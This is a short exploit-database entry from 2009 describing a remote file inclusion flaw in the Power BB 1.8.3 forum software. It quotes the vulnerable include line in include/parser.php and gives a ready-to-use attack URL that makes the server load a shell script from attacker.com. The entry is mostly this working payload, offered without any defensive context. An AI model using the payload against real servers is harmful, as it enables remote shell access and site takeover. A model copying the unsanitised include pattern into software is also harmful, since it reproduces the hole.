id: 10017
date: 11/25/2009
title: Power BB 1.8.3 Remote File Includes
author: DigitALL
cves: 

===================================
Power BB 1.8.3 Remote File Includes
===================================

## Sites : http://powerwd.net ##
 
## Download : http://www.phpexplorer.com/Goster/536 ##
 
## Download : http://sourceforge.net/projects/pbb/ ##
 
## Power BB 1.8.3 Remote File ?ncludes ##
 
## /include/parser.php
 
## @include($_SERVER['DOCUMENT_ROOT'].$include);
 
## http://server/[path]/include/parser.php?_SERVER[DOCUMENT_ROOT]=http://attacker.com/shell.txt?



#  0day.today [2023-03-24]  #